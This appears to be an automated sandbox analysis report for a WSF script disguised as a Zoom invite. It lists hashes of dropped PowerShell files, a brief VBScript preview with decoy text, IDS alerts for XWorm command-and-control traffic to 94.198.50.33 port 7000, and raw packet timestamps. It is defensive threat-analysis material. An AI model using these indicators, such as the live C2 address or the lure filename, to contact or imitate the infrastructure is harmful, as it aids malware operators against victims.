                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        File type:HTML document, Non-ISO extended-ASCII text, with very long lines (932), with CRLF line terminators
                                        Entropy (8bit):5.101097469073924
                                        TrID:
                                          File name:Zoom_Invite.call-660194855683.wsf
                                          File size:3'639 bytes
                                          MD5:e4895b941c8ea6d76630d6fcb2002292
                                          SHA1:9e3038c82fd6767bfa224f361400fc89cd8d0d89
                                          SHA256:2e63fec5163d85af2caf87e31459a0d6cca4cdb3d65a797e00a62b0c2b76acd7
                                          SHA512:22c79a4fec72693f34933c1845c2225ba33cc9c11dd320a819e1c397dfa2ecc92ad752302fe161f247fd217cc30ec28a2959126a24a95269191dbe1fc473ea76
                                          SSDEEP:96:TZL0XrrMHqk3P09QgNMmr0yRF3tVDQgdjVbi/VN:9LKrrKRs9QsMdy7/VU3
                                          TLSH:D671B7326E0976B1CA5B445220AB7CE5C7ECD21E3A2B08E47C5D0C2E7364D98D0BB98C
                                          File Content Preview:<package>..<job id="manage-tujthyqgfu">..<script language="VBScript">....'NOTE : The Social Security Administration (SSA) is a pivotal institution in the United States, ensuring financial stability and support for millions of Americans...' Created
                                          Icon Hash:68d69b8f86ab9a86
                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2024-09-25T09:27:27.981459+02002841075ETPRO MALWARE Terse Request to paste .ee - Possible Download1192.168.2.649710188.114.97.3443TCP
                                          2024-09-25T09:28:02.698933+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:28:02.698933+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:28:03.102956+02002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:28:03.315694+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:28:03.317572+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:28:14.101804+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:28:14.391747+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:28:24.626314+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:28:24.629187+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:28:32.951933+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:28:32.951933+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:28:32.951985+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:28:32.951985+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:28:35.297569+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:28:35.340957+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:28:45.937994+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:28:45.940715+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:28:56.803320+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:28:56.823213+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:28:56.833284+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:29:00.615610+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:29:00.617100+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:29:02.698223+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:29:02.698223+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:29:09.000724+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:29:09.002768+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:29:09.119549+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:29:09.121730+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:29:09.610711+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:29:09.613558+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:29:14.729201+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:29:14.731558+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:29:20.438800+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:29:20.443067+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:29:31.101677+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:29:31.118873+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:29:32.721145+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:29:32.721145+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:29:34.953706+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:29:34.956480+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:29:45.910028+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:29:45.912721+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:29:46.330771+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:29:46.337966+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:29:52.022973+02002853193ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:29:52.235345+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:29:52.236854+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:29:56.641561+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:29:56.645080+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:30:00.482743+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:30:00.484300+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:30:02.734815+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:30:02.734815+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:30:09.219207+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:30:09.226240+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:30:14.313512+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:30:14.315182+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:30:14.432414+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:30:14.433951+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:30:14.551473+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:30:14.553307+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:30:19.741189+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:30:19.743870+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:30:19.860217+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:30:19.861943+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:30:30.454850+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:30:30.456643+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:30:32.749519+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:30:32.749519+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:30:40.484687+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:30:40.519066+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:30:40.603772+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:30:40.667562+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:30:41.469255+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:30:41.470968+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:30:41.588134+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:30:41.590089+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:30:41.708243+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:30:41.713110+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:30:45.207306+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:30:45.209150+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:30:47.031208+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:30:47.033200+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:30:52.218974+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:30:52.223080+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:30:52.337501+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:30:52.340947+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:31:02.484863+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:31:02.499100+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:31:02.603546+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:31:02.605640+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:31:02.722211+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:31:02.855550+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:31:02.855550+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:31:02.923532+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:31:10.032642+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:31:10.034026+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:31:13.344305+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:31:13.345894+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:31:24.000321+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:31:24.001982+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:31:31.281086+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:31:31.318663+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          2024-09-25T09:31:32.747080+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:31:32.747080+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:31:34.828778+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.649719TCP
                                          2024-09-25T09:31:34.829609+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971994.198.50.337000TCP
                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 25, 2024 09:27:52.331031084 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:27:52.337122917 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:27:52.337222099 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:27:52.453963041 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:27:52.458976984 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:28:02.698932886 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:28:02.740685940 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:28:03.102956057 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:28:03.107918978 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:28:03.315694094 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:28:03.317572117 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:28:03.322424889 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:28:13.757246971 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:28:13.894036055 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:28:14.101804018 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:28:14.146928072 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:28:14.391746998 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:28:14.396847963 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:28:24.413594007 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:28:24.418452024 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:28:24.626313925 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:28:24.629187107 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:28:24.634008884 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:28:32.951932907 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:28:32.951984882 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:28:32.952069044 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:28:35.084224939 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:28:35.089243889 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:28:35.297569036 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:28:35.340956926 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:28:35.346234083 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:28:45.725455999 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:28:45.730384111 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:28:45.937994003 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:28:45.940715075 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:28:45.945918083 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:28:56.381647110 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:28:56.388221979 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:28:56.803319931 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:28:56.823213100 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:28:56.827135086 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:28:56.833283901 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:28:56.838185072 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:00.366252899 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:29:00.408103943 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:00.615609884 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:00.617100000 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:29:00.622114897 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:02.698223114 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:02.740636110 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:29:08.787885904 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:29:08.792989016 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:08.819411993 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:29:08.824239016 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:09.000724077 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:09.002768040 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:29:09.007915974 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:09.119549036 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:09.121730089 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:29:09.127763033 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:09.397254944 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:29:09.402900934 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:09.610711098 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:09.613558054 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:29:09.618504047 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:14.506584883 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:29:14.516925097 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:14.729201078 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:14.731558084 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:29:14.736658096 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:20.225441933 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:29:20.230237961 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:20.438800097 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:20.443067074 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:29:20.448298931 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:30.884934902 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:29:30.889744043 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:31.101676941 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:31.118872881 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:29:31.125407934 CEST70004971994.198.50.33192.168.2.6
